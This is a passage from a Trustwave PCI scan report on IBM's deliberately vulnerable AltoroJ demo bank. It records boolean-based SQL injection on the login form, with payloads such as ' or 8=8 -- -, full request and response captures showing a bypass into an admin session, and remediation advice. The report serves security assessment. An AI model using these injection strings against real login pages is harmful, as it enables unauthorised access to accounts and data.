content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

8 SQL Injection Vulnerability 7.5 High Fail URL: https://65.61.137.117:8443/doLogin


Port: tcp/8443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 127 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117:8443/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 128 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:38:36 GMT
Connection: close

<!doctype html><html lang="en"><head><title>HTTP Status 500 ?


Internal Server Error</title><style type="text/css">H1 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-
serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-
serif;color:black;background-color:white;} B {font-
family:Tahoma,Arial,sans-serif;color:white;background-
color:#525D76;} P {font-family:Tahoma,Arial,sans-
serif;background:white;color:black;font-size:12px;}A {color :
black;}A.name {color : black;}HR {color :
#525D76;}</style></head><body><h1>HTTP Status 500 ? Internal
Server Error</h1><hr class="line" /><p><b>Type</b> Status
Report</p><p><b>Description</b> The server encountered an
unexpected condition that prevented it from fulfilling the
request.</p><hr class="line" /><h3>Apache
False Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 129 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:38:37 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 130 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 131 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 132 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13"
href="index.jsp?content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 133 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 134 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 135 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 136 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 137 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

9 SQL Injection Vulnerability 7.5 High Fail URL: https://65.61.137.117/doLogin


Port: tcp/443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 138 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 139 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:05:35 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 140 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 141 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 142 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

<form name="details" method="get" action="


showAccount">
<table border="0">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 143 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
<option value="4485983356242217" >4485983356242217 Credit
Card</option>
<option value="800008" >800008 Savings</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 144 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 145 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 146 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:05:35 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 147 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
